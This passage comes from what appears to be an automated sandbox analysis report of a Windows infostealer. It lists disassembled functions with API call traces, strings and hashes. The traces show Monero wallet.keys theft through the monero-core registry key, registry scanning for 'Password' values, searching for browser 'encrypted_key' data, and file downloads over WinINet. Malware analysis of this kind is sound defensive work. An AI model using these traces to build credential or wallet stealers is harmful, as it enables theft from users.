                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                • API String ID: 3240024479-1526165396
                                • Opcode ID: 86f2aa2ec6726d1cf1d31a6ef886599251aefddd58a6c0cc81217d1e02089553
                                • Instruction ID: cd9db12b7198c8494e0cf970f24cb45f7f25df418e4b5ba042aa9385c3f2f17e
                                • Opcode Fuzzy Hash: 86f2aa2ec6726d1cf1d31a6ef886599251aefddd58a6c0cc81217d1e02089553
                                • Instruction Fuzzy Hash: 8251FD30910148DBEB18FF64CD96AED77B9AF10301F504499F40A6A5B2EF386B45DB62
                                Function 00B812D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: 5d6b449b257902292dd4750ccaad6a8696f11b41a2d5204842db0d4142533726
                                • Instruction ID: 528ab57c33dadaa44a15046c54b926d0a48b71f842101f929b03232cfda97ac0
                                • Opcode Fuzzy Hash: 5d6b449b257902292dd4750ccaad6a8696f11b41a2d5204842db0d4142533726
                                • Instruction Fuzzy Hash: 64C181B5900219DBCB14FF64DC89FEA73B8BB54304F0045DDE50AA7261EA74AA85CFA1
                                Function 00B84280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00B88DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B88E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00B842EC
                                • lstrcat.KERNEL32(?,0093DF08), ref: 00B8430B
                                • lstrcat.KERNEL32(?,?), ref: 00B8431F
                                • lstrcat.KERNEL32(?,0093CE98), ref: 00B84333
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                  • Part of subcall function 00B88D90: GetFileAttributesA.KERNEL32(00000000,?,00B71B54,?,?,00B9564C,?,?,00B90E1F), ref: 00B88D9F
                                  • Part of subcall function 00B79CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00B79D39
                                  • Part of subcall function 00B799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B799EC
                                  • Part of subcall function 00B799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00B79A11
                                  • Part of subcall function 00B799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00B79A31
                                  • Part of subcall function 00B799C0: ReadFile.KERNEL32(000000FF,?,00000000,00B7148F,00000000), ref: 00B79A5A
                                  • Part of subcall function 00B799C0: LocalFree.KERNEL32(00B7148F), ref: 00B79A90
                                  • Part of subcall function 00B799C0: CloseHandle.KERNEL32(000000FF), ref: 00B79A9A
                                  • Part of subcall function 00B893C0: GlobalAlloc.KERNEL32(00000000,00B843DD,00B843DD), ref: 00B893D3
                                • StrStrA.SHLWAPI(?,0093DFB0), ref: 00B843F3
                                • GlobalFree.KERNEL32(?), ref: 00B84512
                                  • Part of subcall function 00B79AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00B74EEE,00000000,00000000), ref: 00B79AEF
                                  • Part of subcall function 00B79AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00B74EEE,00000000,?), ref: 00B79B01
                                  • Part of subcall function 00B79AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00B74EEE,00000000,00000000), ref: 00B79B2A
                                  • Part of subcall function 00B79AC0: LocalFree.KERNEL32(?,?,?,?,00B74EEE,00000000,?), ref: 00B79B3F
                                • lstrcat.KERNEL32(?,00000000), ref: 00B844A3
                                • StrCmpCA.SHLWAPI(?,00B908D1), ref: 00B844C0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00B844D2
                                • lstrcat.KERNEL32(00000000,?), ref: 00B844E5
                                • lstrcat.KERNEL32(00000000,00B90FB8), ref: 00B844F4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                • String ID:
                                • API String ID: 3541710228-0
                                • Opcode ID: cb8df60edf3ce9d4a672bdc4baf064eb01715480f486e0f213236d7c8a994436
                                • Instruction ID: cd9e0fc463bbc988bff7145646082a7a89f1ab53873d36274591ff29bfde0fa1
                                • Opcode Fuzzy Hash: cb8df60edf3ce9d4a672bdc4baf064eb01715480f486e0f213236d7c8a994436
                                • Instruction Fuzzy Hash: EE7144B6900208BBDB14FBB4DC85FEE73B9AB58300F0485D8F61997191EA34DB45DBA1
                                Function 00B71310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00B712A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B712B4
                                  • Part of subcall function 00B712A0: RtlAllocateHeap.NTDLL(00000000), ref: 00B712BB
                                  • Part of subcall function 00B712A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00B712D7
                                  • Part of subcall function 00B712A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00B712F5
                                  • Part of subcall function 00B712A0: RegCloseKey.ADVAPI32(?), ref: 00B712FF
                                • lstrcat.KERNEL32(?,00000000), ref: 00B7134F
                                • lstrlen.KERNEL32(?), ref: 00B7135C
                                • lstrcat.KERNEL32(?,.keys), ref: 00B71377
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                  • Part of subcall function 00B8A9B0: lstrlen.KERNEL32(?,00938A70,?,\Monero\wallet.keys,00B90E17), ref: 00B8A9C5
                                  • Part of subcall function 00B8A9B0: lstrcpy.KERNEL32(00000000), ref: 00B8AA04
                                  • Part of subcall function 00B8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B8AA12
                                  • Part of subcall function 00B8A8A0: lstrcpy.KERNEL32(?,00B90E17), ref: 00B8A905
                                  • Part of subcall function 00B88B60: GetSystemTime.KERNEL32(00B90E1A,00939FD8,00B905AE,?,?,00B713F9,?,0000001A,00B90E1A,00000000,?,00938A70,?,\Monero\wallet.keys,00B90E17), ref: 00B88B86
                                  • Part of subcall function 00B8A920: lstrcpy.KERNEL32(00000000,?), ref: 00B8A972
                                  • Part of subcall function 00B8A920: lstrcat.KERNEL32(00000000), ref: 00B8A982
                                • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00B71465
                                  • Part of subcall function 00B8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B8A7E6
                                  • Part of subcall function 00B799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B799EC
                                  • Part of subcall function 00B799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00B79A11
                                  • Part of subcall function 00B799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00B79A31
                                  • Part of subcall function 00B799C0: ReadFile.KERNEL32(000000FF,?,00000000,00B7148F,00000000), ref: 00B79A5A
                                  • Part of subcall function 00B799C0: LocalFree.KERNEL32(00B7148F), ref: 00B79A90
                                  • Part of subcall function 00B799C0: CloseHandle.KERNEL32(000000FF), ref: 00B79A9A
                                • DeleteFileA.KERNEL32(00000000), ref: 00B714EF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                • API String ID: 3478931302-218353709
                                • Opcode ID: 9337e8bc8ee9d03ac8b8c6d5c41c154595e68b306f096c44325004b26ceaace5
                                • Instruction ID: 13b6533f6f80c584c229bb7070754622f2e6d282bec3880f31c025ca3f845c61
                                • Opcode Fuzzy Hash: 9337e8bc8ee9d03ac8b8c6d5c41c154595e68b306f096c44325004b26ceaace5
                                • Instruction Fuzzy Hash: AC5155B1D5011897DB15FB64DC92FED73BCAF50300F4045E9B60AA20A1EE346B89CBA6
                                Function 00B775D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00B772D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00B7733A
                                  • Part of subcall function 00B772D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00B773B1
                                  • Part of subcall function 00B772D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00B7740D
                                  • Part of subcall function 00B772D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00B77452
                                  • Part of subcall function 00B772D0: HeapFree.KERNEL32(00000000), ref: 00B77459
                                • lstrcat.KERNEL32(00000000,00B917FC), ref: 00B77606
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00B77648
                                • lstrcat.KERNEL32(00000000, : ), ref: 00B7765A
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00B7768F
                                • lstrcat.KERNEL32(00000000,00B91804), ref: 00B776A0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00B776D3
                                • lstrcat.KERNEL32(00000000,00B91808), ref: 00B776ED
                                • task.LIBCPMTD ref: 00B776FB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                • String ID: :
                                • API String ID: 2677904052-3653984579
                                • Opcode ID: 4b5552f95f676329fcb2934712120f2c10882bdf40153cad156012cb5caa75ac
                                • Instruction ID: 57965a1aa515917df2518f10b2f021a7e1b86f76c5d2d05f911aa5e205189b8c
                                • Opcode Fuzzy Hash: 4b5552f95f676329fcb2934712120f2c10882bdf40153cad156012cb5caa75ac
                                • Instruction Fuzzy Hash: CF3163B5940209EFCB04EBB8DC89DFF73B8BB44301B148258F116A7260DE34A946DB61
                                Function 00B88100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0093DB00,00000000,?,00B90E2C,00000000,?,00000000), ref: 00B88130
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00B88137
                                • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00B88158
                                • __aulldiv.LIBCMT ref: 00B88172
                                • __aulldiv.LIBCMT ref: 00B88180
                                • wsprintfA.USER32 ref: 00B881AC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                • String ID: %d MB$@
                                • API String ID: 2774356765-3474575989
                                • Opcode ID: 925c5db78b2afba5c9d3e6a2304bece14d2ca697b7b23c17d513a92fad75cb6c
                                • Instruction ID: e4c3f350e62b2111bf2892f21851c5da93e0d831dd5f5fa8ed2a0e5915d8da5a
                                • Opcode Fuzzy Hash: 925c5db78b2afba5c9d3e6a2304bece14d2ca697b7b23c17d513a92fad75cb6c
                                • Instruction Fuzzy Hash: 3421F9B1E44218EBDB04EFD4CC49FAEB7B8EB48B10F104659F605BB290DB7859018BA5
                                Function 00B760A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00B8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B8A7E6
                                  • Part of subcall function 00B747B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00B74839
                                  • Part of subcall function 00B747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00B74849
                                • InternetOpenA.WININET(00B90DF7,00000001,00000000,00000000,00000000), ref: 00B7610F
                                • StrCmpCA.SHLWAPI(?,0093E310), ref: 00B76147
                                • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00B7618F
                                • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00B761B3
                                • InternetReadFile.WININET(?,?,00000400,?), ref: 00B761DC
                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00B7620A
                                • CloseHandle.KERNEL32(?,?,00000400), ref: 00B76249
                                • InternetCloseHandle.WININET(?), ref: 00B76253
                                • InternetCloseHandle.WININET(00000000), ref: 00B76260
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                • String ID:
                                • API String ID: 2507841554-0
                                • Opcode ID: 80b692f42d8301a1aeed4769eb45e92f5ddcf79775e90d5c5bc0c382bc71c170
                                • Instruction ID: 36fcb6f2a1154ec1c9d87d9edc6c9bb82cfa0e0756e346d9ba849c389971799a
                                • Opcode Fuzzy Hash: 80b692f42d8301a1aeed4769eb45e92f5ddcf79775e90d5c5bc0c382bc71c170
                                • Instruction Fuzzy Hash: 85516FB1900618EBEB20DF54DC49BEE77B8EB44701F1081D8B609B72D1DB746A89CFA5
                                Function 00B772D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00B7733A
                                • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00B773B1
                                • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00B7740D
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00B77452
                                • HeapFree.KERNEL32(00000000), ref: 00B77459
                                • task.LIBCPMTD ref: 00B77555
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$EnumFreeOpenProcessValuetask
                                • String ID: Password
                                • API String ID: 775622407-3434357891
                                • Opcode ID: 464b42013e5c505d92530aa98db7001c9532862136c0a7181e5bfdd98f09e9d8
                                • Instruction ID: 8f24432964794330e4249dd0d1b6e229fcdcc240a210250fa071a699e06119aa
                                • Opcode Fuzzy Hash: 464b42013e5c505d92530aa98db7001c9532862136c0a7181e5bfdd98f09e9d8
                                • Instruction Fuzzy Hash: C161F7B59442689BDB24DB50DC85BDAB7F8BF48300F0081E9E65DA6241DFB05BC9CFA1
                                Function 00B7BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                  • Part of subcall function 00B8A9B0: lstrlen.KERNEL32(?,00938A70,?,\Monero\wallet.keys,00B90E17), ref: 00B8A9C5
                                  • Part of subcall function 00B8A9B0: lstrcpy.KERNEL32(00000000), ref: 00B8AA04
                                  • Part of subcall function 00B8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B8AA12
                                  • Part of subcall function 00B8A920: lstrcpy.KERNEL32(00000000,?), ref: 00B8A972
                                  • Part of subcall function 00B8A920: lstrcat.KERNEL32(00000000), ref: 00B8A982
                                  • Part of subcall function 00B8A8A0: lstrcpy.KERNEL32(?,00B90E17), ref: 00B8A905
                                  • Part of subcall function 00B8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B8A7E6
                                • lstrlen.KERNEL32(00000000), ref: 00B7BC9F
                                  • Part of subcall function 00B88E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00B88E52
                                • StrStrA.SHLWAPI(00000000,AccountId), ref: 00B7BCCD
                                • lstrlen.KERNEL32(00000000), ref: 00B7BDA5
                                • lstrlen.KERNEL32(00000000), ref: 00B7BDB9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
